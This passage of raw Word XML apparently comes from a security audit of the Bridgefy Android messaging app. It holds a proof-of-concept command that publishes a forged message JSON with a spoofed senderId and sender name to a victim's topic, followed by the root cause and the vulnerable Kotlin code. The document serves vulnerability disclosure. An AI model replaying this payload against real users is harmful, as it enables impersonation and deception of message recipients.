      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-P </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$ATTACKER_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"bf/'$ATTACKER_ID'/'$VICTIM_ID'"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'{"id":"e480eb8c-7bdd-41ed-b9fe-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>4285d4288d00","message":"{\"payload\":{\"createdOn\":16 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>72417105535,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>\"senderId\":\"'$SPOOFED_ID'\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,\"message\":\"from +12012987481 spoofing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+12066561175\",\"receiverNickname\":\"oscarm\",\"receiverAvatar\":7,\"receiverName\":\" Oscar\",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>\"senderNickname\":\"dontknow\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,\"receiverId\":\"'$VICTIM_ID'\",\"dateSent\":16 72417105535,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>\"senderName\":\"anyname\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,\"status\":2,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>\"senderAvatar\":6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>},\"uuid\":\"e400 eb8c-7bdd-44ed-b9fe-4285d4288300\"}","timestamp":1672417105535}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="363"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>victim device receives the spoofed message and the user has no way to tell it has been spoofed:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="67"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487593472">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2446121</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>204203</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3333750" cy="2667000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="22" name="Image 22"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="22" name="Image 22"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3333750" cy="2667000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="84"/>
        <w:ind w:left="354" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fig.:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>spoof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>direct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The root cause for this issue is that the current message structure allows clients to supply arbitrary sender data, the approach can be corroborated by reviewing the following files:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="228"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(Android):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="369" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-android/Framework/MessageManager/src/main/java/me/bridgefy/framewor k/messagemanager/internal/MessageManagerImpl.kt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(Android):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="1511" w:right="585" w:hanging="792"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>suspend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>validateReceivedChatRoom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(messageId:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>payload:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>var </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>chatRoom = chatRoomRepository.findChatRoom(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>payload.senderId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(chatRoom != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>chatRoom.lastMessageType = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MESSAGE_RECEIVED</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1907" w:right="2112" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>chatRoom.updatedAt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>System.currentTimeMillis() chatRoom.mark = 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="1907" w:right="2112" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>chatRoom.counter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>chatRoom.counter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1 chatRoom.lastMessage = payload.message</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>chatRoom.lastMessageStatus = payload.status </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>?:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MessageStatus.STATUS_RECEIVED.ordinal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="720" w:right="2112" w:firstLine="1187"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(chatRoom.chatRoomAvatar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>!=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>payload.senderAvatar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
